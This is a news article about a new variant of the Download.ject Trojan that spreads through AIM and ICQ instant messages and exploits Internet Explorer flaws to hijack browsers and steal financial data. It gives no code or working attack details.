New AIM Trojan steals financial data

A new variant of Download.ject is threatening AIM users, opening backdoors and stealing financial data.

This Content Component encountered an error

A new variant of Download.ject is in the wild, using instant messaging to spread. Like the first strain, this Trojan horse is designed to open backdoors and steal financial data, according to PivX Solutions. The Newport Beach, Calif.-based security firm was still analyzing the scope of the threat Thursday afternoon.

"This one has most of the characteristics of the first Dowload.ject," said Thor Larholm, senior security researcher with PivX. "The difference is that this one uses instant messaging to spread. If you receive the message and click the link, you're infected. Like the first attack, this one also appears to be financially motivated."

Larholm said it arrives as a harmless-looking instant message on AIM or ICQ that reads, "My personal home page http://XXXXXXX.X-XXXXXX.XXX/." Once the user clicks on this link Internet Explorer opens a malicious Web site that infects the user through several Internet Explorer vulnerabilities. The first thing users with infected machines will notice is a modified home page and search pane in the browser. In place of the user's preferred home page is a site called TargetSearch and several browser windows displaying adult advertisements and referral links. PivX has notified antivirus vendors so they can create signatures for the threat, Larholm said.

The first Download.ject attack in June compromised machines using Windows Internet Explorer and Internet Information Services 5.0 (IIS). Microsoft concluded the assault was a targeted, manual attack by individuals or entities towards a specific server. The Trojan used compromised sites to append JavaScript to the bottom of Web pages. When executed, the JavaScript accesses a file hosted on another server believed to contain malicious code that could affect the end user's system.

The HangUP Team, a for-profit malicious code group from Russia, is believed responsible for the first Download.ject and for the recent rash of Korgo worms that attacked the LSASS vulnerability Microsoft outlined in Security Bulletin MS04-011. Experts believe the goal of the attack was to deliver malicious code to visitors of an affected Web site that could be used to steal credit card and other information that would then be sold to organized identity theft groups.

It's unclear if the HangUP Team is behind the latest variant.

Dig deeper on Debit and credit card fraud prevention

0 comments

Oldest 

Forgot Password?

No problem! Submit your e-mail address below. We'll send you an email containing your password.

Your password has been sent to:

-ADS BY GOOGLE

SearchSecurity

SearchCloudSecurity

SearchNetworking

SearchCIO

SearchConsumerization

SearchEnterpriseDesktop

ComputerWeekly

Close